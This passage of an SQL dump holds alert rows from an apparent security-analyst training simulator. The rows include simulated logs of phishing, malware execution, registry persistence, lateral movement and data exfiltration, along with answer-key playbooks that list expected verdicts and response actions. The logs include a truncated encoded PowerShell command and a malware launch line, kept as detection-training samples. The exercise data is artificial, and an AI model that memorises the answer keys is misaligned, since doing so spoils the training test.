1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1339, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'The final stage of the operation sees MuddyWater exfiltrating valuable data, completing their attack chain and achieving their malicious goals. Data has been exfiltrated from the telecommunications network to external servers.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:54Z\",\"event_type\":\"exfiltration_attempt\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.10\",\"protocol\":\"HTTPS\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"confidential_project_data.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"result\":\"success\",\"detection_system\":\"DLP\"}', '2026-03-01 22:56:56', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known data stealing tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_project_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_file_scan\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data archive being transferred externally\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:54Z\\\",\\\"event_type\\\":\\\"exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.10\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_transfer\\\",\\\"result\\\":\\\"success\\\",\\\"detection_system\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1340, 'Suspicious Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting an employee with a malicious link. The email originated from an external IP and contained a suspicious file attachment.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"email_id\":\"f123abc456@malicious.com\",\"source_ip\":\"203.0.113.45\",\"destination_email\":\"employee@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_link\":\"http://malicious-example.com/login\",\"internal_ip\":\"10.0.5.23\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"f123abc456@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in known phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware known as \'APT PhishDoc\'.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-example.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL is a phishing site attempting to steal credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Spear Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.836Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1341, 'Execution of DanBot Malware', 'critical', 'Endpoint Detection and Response (EDR)', 'Upon clicking the link, the malicious payload is executed, establishing a foothold with DanBot malware.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"process_creation\",\"host\":{\"hostname\":\"compromised-host\",\"ip\":\"10.0.1.5\"},\"user\":\"jdoe\",\"process\":{\"pid\":3482,\"name\":\"cmd.exe\",\"command_line\":\"cmd.exe /c start C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\danbot.exe\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\danbot.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":204800},\"network\":{\"connections\":[{\"remote_ip\":\"198.51.100.23\",\"remote_port\":443,\"protocol\":\"TCP\"}]}}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure for DanBot.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as DanBot malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1342, 'Establishment of Persistence Mechanisms', 'high', 'System Registry Logs', 'The malware modifies registry settings to maintain persistence, ensuring it survives system reboots. The modification was detected in the Windows registry, where a new startup key was added pointing to a malicious executable.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"event_type\":\"Registry Modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value\":\"C:\\\\Windows\\\\System32\\\\malicious_executable.exe\",\"user\":\"COMPROMISED_USER\",\"source_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"file_hash\":\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\",\"username\":\"admin_user\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account activity indicates potential compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.840Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"event_type\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_executable.exe\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"e3f1b2d8c9a2f1b3a5c6d7e8f9b0a1c2\\\",\\\"username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1343, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'Using harvested credentials, the attacker attempts to move laterally across the network to identify valuable targets. The activity was detected through unusual network traffic patterns originating from an internal system.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.15\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"success\",\"file\":{\"name\":\"malicious_script.ps1\",\"hash\":\"f4d7c3b2a5e5d8e2c8b5a5f6c3d2b4a8\"},\"protocol\":\"RDP\",\"user_agent\":\"Mozilla/5.0\",\"event_id\":\"4624\",\"description\":\"Successful login using a potentially compromised account.\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f4d7c3b2a5e5d8e2c8b5a5f6c3d2b4a8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious PowerShell script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1344, 'Data Staging for Exfiltration', 'high', 'File Integrity Monitoring', 'Valuable data from compromised systems is identified and staged for exfiltration, indicating an imminent data breach. The attacker has aggregated sensitive files in a directory for easy transfer.', 'Exfiltration', 'T1074: Data Staged', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:48:23Z\",\"event_id\":\"FIM202310251448\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"username\":\"john.doe\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\Sensitive\\\\staged_data.zip\",\"file_hash\":\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\",\"operation\":\"file_write\",\"status\":\"success\",\"comments\":\"Sensitive data staged for exfiltration detected.\"}', '2026-03-01 22:57:36', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous exfiltration attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local user machine.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected associated with this user.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\john.doe\\\\Documents\\\\Sensitive\\\\staged_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File created as a staging point for data exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:48:23Z\\\",\\\"event_id\\\":\\\"FIM202310251448\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"john.doe\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\john.doe\\\\\\\\Documents\\\\\\\\Sensitive\\\\\\\\staged_data.zip\\\",\\\"file_hash\\\":\\\"3a5f6c9e8b7d9ab2c3d4e5f6a7b8c9d0\\\",\\\"operation\\\":\\\"file_write\\\",\\\"status\\\":\\\"success\\\",\\\"comments\\\":\\\"Sensitive data staged for exfiltration detected.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.843Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 